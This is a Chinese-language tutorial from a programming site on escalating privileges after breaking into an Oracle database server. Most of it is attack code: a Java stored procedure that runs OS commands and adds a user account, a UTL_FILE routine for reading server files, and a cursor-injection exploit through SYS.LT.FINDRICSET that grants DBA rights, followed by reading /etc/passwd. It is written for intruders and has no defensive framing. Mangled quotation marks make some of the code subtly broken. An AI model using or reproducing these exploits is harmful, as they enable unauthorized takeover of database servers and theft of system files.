程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> Oracle數據庫 >> Oracle數據庫基礎 >> Oracle服務器如何進一步的獲取權限

Oracle服務器如何進一步的獲取權限

編輯:Oracle數據庫基礎

再進行入侵Oracle服務器的進一步來獲取權限時,我們需要快速的連接上Oracle服務器,此時你會發現,的情況有,連接之後不是dba權限,或不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升權限。

3.運行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.JSP’) FROM dual 後發現Oracle服務器不能連接網絡。

幸運的是,

運行

  1. create or replace function Linx_Query (p varchar2) 
    return number authid current_user is begin execute 
    immediate p; return 1;end; 

成功!這個用戶具有create proceduce權限。

此時馬上想到創建Java擴展執行命令:

  1. create or replace and compile Java source named 
    “LinxUtil” as import Java.io.*; public class LinxUtil extends Object 
    {public static String runCMD(String args) {try{BufferedReader myReader

    new
     BufferedReader
    (new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); 
    String stemp,str=”";while ((stemp = myReader
    .readLine()) != null) str +=stemp+” 
    “;myReader.close();return str;} catch (Exception e){return e.toString();}}}  
  2. begin dbms_Java.grant_permission
    (‘PUBLIC’, ‘SYS:Java.io.FilePermission’, ‘<>’, ‘execute’ );end;  
  3. create or replace function LinxRunCMD(p_cmd in varchar2) 
    return varchar2 as language Java name 
    ‘LinxUtil.runCMD(Java.lang.String) return String’  
  4. select * from all_objects where object_name like ‘%LINX%’  
  5. grant all on LinxRunCMD to public  
  6. select LinxRunCMD(‘cmd /c net user linx /add’) from dual  

但是在第一步就卡住了,服務器由於某種未知原因 不能創建Java擴展!!

還好,我們還有UTL庫可以利用:

  1. create or replace function LinxUTLReadfile 
    (filename varchar2) return varchar2 is  
  2. fHandler UTL_FILE.FILE_TYPE;  
  3. buf varchar2(4000);  
  4. output varchar2(8000);  
  5. BEGIN  
  6. fHandler :UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);  
  7. loop  
  8. begin  
  9. utl_file.get_line(fHandler,buf);  
  10. DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);  
  11. exception  
  12. when no_data_found then exit;  
  13. end;  
  14. output :output||buf||chr(10);  
  15. end loop;  
  16. UTL_FILE.FCLOSE(fHandler);  
  17. return output;  
  18. END;  

UTL_FILE_DIR需要先用:

  1. CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’; 

指定目。但運行後發現沒有權限。只好想辦法提權。

游標注射

老外寫了N個pdf介紹這技術,我精簡了代碼:

  1. DECLARE  
  2.  
  3. MYC NUMBER;  
  4. BEGIN  
  5. MYC :DBMS_SQL.OPEN_CURSOR;  
  6. DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; 
    begin execute immediate 
    ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);  
  7. DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  8. BEGIN SYS.LT.FINDRICSET
    (‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;  
  9. raise NO_DATA_FOUND;  
  10. EXCEPTION  
  11. WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  12. WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  13. END;  

運行後重新連接就有dba權限了,簡單吧……

現在可以讀取文件了:

  1. CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;  
  2. select LinxUTLReadfile(‘passwd’) from dual  

後面就簡單了,不寫了。上述的相關內容就是對入侵Oracle服務器進一步獲取權限的描述,希望會給你帶來一些幫助在此方面。

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved